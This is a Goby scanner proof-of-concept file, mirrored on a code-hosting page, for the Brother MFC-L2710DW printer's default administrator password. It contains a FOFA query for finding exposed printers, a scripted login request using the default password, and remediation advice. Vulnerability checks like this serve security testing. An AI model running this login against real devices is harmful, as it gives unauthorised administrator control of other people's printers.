qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/MFC-L2710DW-default-passwor...

162 lines
5.9 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "MFC-L2710DW default password vulnerability",
"Description": "<p>The MFC-L2710DW is a printer device. The device has a default password, and attackers can control the entire platform through the default password (password: initpass) vulnerability, and use administrator privileges to operate core functions.<br></p>",
"Product": "MFC-L2710DW",
"Homepage": "https://support.brother.com/",
"DisclosureDate": "2022-04-09",
"Author": "13eczou",
"FofaQuery": "title==\"Brother MFC-L2710DW series\"",
"GobyQuery": "title==\"Brother MFC-L2710DW series\"",
"Level": "1",
"Impact": "<p>Attackers can control the entire platform through the default password initpass vulnerability, and use administrator privileges to operate core functions.<br></p>",
"Recommendation": "<p>1. Modify the default password. The password should preferably contain uppercase and lowercase letters, numbers and special characters, and the number of digits is greater than 8.</p><p>2. If it is not necessary, it is forbidden to access the system from the public network.</p><p>3. Set access policies and whitelist access through security devices such as firewalls.</p>",
"References": [
"https://fofa.info/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/general/status.html",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "CSRFToken=lPRQjQ5KASuaRuxSkRh7KmQIYWY602w4AA%3D%3D&B8d5=initpass&loginurl=%2Fgeneral%2Fstatus.html"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "301",
"bz": ""
},
{
"type": "item",
"variable": "$head",
"operation": "contains",
"value": "Set-Cookie",
"bz": ""
},
{
"type": "item",
"variable": "$head",
"operation": "contains",
"value": "AuthCookie",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/general/status.html",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "CSRFToken=lPRQjQ5KASuaRuxSkRh7KmQIYWY602w4AA%3D%3D&B8d5=initpass&loginurl=%2Fgeneral%2Fstatus.html"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "301",
"bz": ""
},
{
"type": "item",
"variable": "$head",
"operation": "contains",
"value": "Set-Cookie",
"bz": ""
},
{
"type": "item",
"variable": "$head",
"operation": "contains",
"value": "AuthCookie",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|text|(密码initpass)"
]
}
],
"Tags": [
"default Password"
],
"VulType": [
"default Password"
],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "5.0",
"Translation": {
"CN": {
"Name": "MFC-L2710DW 默认口令漏洞",
"Product": "MFC-L2710DW ",
"Description": "<p><span style=\"font-size: medium;\"><span style=\"color: rgb(0, 0, 0);\">MFC-L2710DW&nbsp;&nbsp;</span>是一款打印机设备。该设备存在默认口令,<span style=\"color: rgb(53, 53, 53);\">攻击者可通过默认口令密码initpass漏洞控制整个平台使用管理员权限操作核心的功能。</span></span><br></p>",
"Recommendation": "<p>1、修改默认口令密码最好包含大小写字母、数字和特殊字符等且位数大于8位。</p><p>2、如非必要禁止公网访问该系统。</p><p>3、通过防火墙等安全设备设置访问策略设置白名单访问。</p>",
"Impact": "<p><span style=\"font-size: medium; color: rgb(53, 53, 53);\">攻击者可通过默认口令密码initpass漏洞控制整个平台使用管理员权限操作核心的功能。</span><br></p>",
"VulType": [
"默认口令"
],
"Tags": [
"默认口令"
]
},
"EN": {
"Name": "MFC-L2710DW default password vulnerability",
"Product": "MFC-L2710DW",
"Description": "<p>The MFC-L2710DW is a printer device. The device has a default password, and attackers can control the entire platform through the default password (password: initpass) vulnerability, and use administrator privileges to operate core functions.<br></p>",
"Recommendation": "<p>1. Modify the default password. The password should preferably contain uppercase and lowercase letters, numbers and special characters, and the number of digits is greater than 8.</p><p>2. If it is not necessary, it is forbidden to access the system from the public network.</p><p>3. Set access policies and whitelist access through security devices such as firewalls.</p>",
"Impact": "<p>Attackers can control the entire platform through the default password initpass vulnerability, and use administrator privileges to operate core functions.<br></p>",
"VulType": [
"default Password"
],
"Tags": [
"default Password"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}
Reference in New Issue View Git Blame Copy Permalink